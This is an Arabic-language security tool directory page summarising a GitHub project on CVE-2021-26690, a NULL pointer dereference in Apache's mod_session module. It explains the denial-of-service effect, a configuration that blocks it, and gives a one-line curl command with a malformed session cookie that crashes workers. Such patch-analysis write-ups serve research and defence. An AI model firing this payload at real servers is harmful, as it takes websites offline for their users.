Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/7own/cve-2021-26690---apache-mod_session
تحليل الثغرات الأمنيةالاستغلالأمن الويباختبار الاختراق
GitHub7own/cve-2021-26690---apache-mod_session

CVE-2021-26690---Apache-mod_session

CVE-2021-26690 مقارنة التصحيحات - Apache HTTP mod_session إلغاء مرجع المؤشر الفارغ

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
11منذ سنة واحدةلم تتم المراجعة بعد

مقارنة التصحيحات لـ CVE-2021-26690 - وحدة Apache mod_session

هذه الثغرة هي إلغاء مرجعية مؤشر فارغ (NULL pointer dereference) داخل وحدة mod_session الخاصة بـ Apache. سيؤدي ذلك إلى رفض الخدمة (Denial of Service) لعمليات الأطفال (child processes) لخادم httpd الخاص بـ Apache. باستخدام حلقة تكرارية، سيتعطل كل عامل (worker) من Apache، مما يؤدي إلى رفض الخدمة لجميع العملاء الذين يتصلون أو متصلون بالموقع.

تم اكتشاف هذه الثغرة في البداية بواسطة @antonio-morales.

للمراحل الكاملة للعملية، راجع ملف PDF في هذا المستودع.

القصور

إذا قام الخادم بتطبيق خيار SessionCryptoPassphrase عبر mod_session_crypto، فسيتم تشفير ملف تعريف الارتباط (cookie) وتشفيره بـ base64.

root@kitploit:~
<IfModule mod_session.c>
Session On
SessionCookieName session path=/
SessionCryptoPassphrase "YourSecurePassphrase"
SessionMaxAge 1800
</IfModule>

في هذه الحالة، لا يمكن العبث بأزواج ملفات تعريف الارتباط للجلسة، ولا يمكن حدوث رفض الخدمة كما هو.

الاستغلال

root@kitploit:~
curl http://$IP:$PORT/ -v -b 'session=expiry=123456789&='
تنزيل الأداة